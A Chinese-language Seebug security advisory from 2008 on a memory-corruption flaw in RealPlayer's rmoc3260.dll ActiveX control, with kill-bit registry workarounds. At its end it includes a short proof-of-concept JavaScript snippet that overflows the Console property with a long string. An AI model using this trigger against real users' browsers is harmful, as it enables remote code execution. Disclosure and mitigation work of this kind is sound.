RealNetworks RealPlayer rmoc3260.dll ActiveX控件内存破坏漏洞

2008-03-15T00:00:00
ID SSV:3037
Type seebug
Reporter Root
Modified 2008-03-15T00:00:00

Description

BUGTRAQ ID: 28157

RealPlayer是一款流行的多媒体播放器,支持多种媒体格式。

RealPlayer的rmoc3260.dll ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞控制用户系统。

rmoc3260.dll ActiveX控件没有正确地处理Console属性的输入参数,如果用户受骗访问了恶意站点的话,就可能触发内存破坏,导致执行任意指令。

Real Networks RealPlayer 11.0.1 (build 6.0.14.794) 临时解决方法:

  • 在IE中禁用RealPlayer ActiveX控件,为以下CLSID设置kill bit:

{0FDF6D6B-D672-463B-846E-C6FF49109662} {224E833B-2CC6-42D9-AE39-90B6A38A4FA2} {2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93} {3B46067C-FD87-49B6-8DDD-12F0D687035F} {3B5E0503-DE28-4BE8-919C-76E0E894A3C2} {44CCBCEB-BA7E-4C99-A078-9F683832D493} {A1A41E11-91DB-4461-95CD-0C02327FD934} {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}

或者将以下文本保存为.REG文件并导入:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility{0FDF6D6B-D672-463B-846E-C6FF49109662}] "Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility{224E833B-2CC6-42D9-AE39-90B6A38A4FA2}] "Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}] "Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility{3B46067C-FD87-49B6-8DDD-12F0D687035F}] "Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility{3B5E0503-DE28-4BE8-919C-76E0E894A3C2}] "Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility{44CCBCEB-BA7E-4C99-A078-9F683832D493}] "Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility{A1A41E11-91DB-4461-95CD-0C02327FD934}] "Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}] "Compatibility Flags"=dword:00000400

厂商补丁:

Real Networks

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=http://www.real.com target=_blank>http://www.real.com</a>

                                        
                                            
                                                var&nbsp;buf&nbsp;=&nbsp;'';
while&nbsp;(buf.length&nbsp;&lt;&nbsp;1005)&nbsp;buf&nbsp;=&nbsp;buf&nbsp;+&nbsp;'A';

m&nbsp;=&nbsp;obj.Console;
obj.Console&nbsp;=&nbsp;buf;
obj.Console&nbsp;=&nbsp;m

//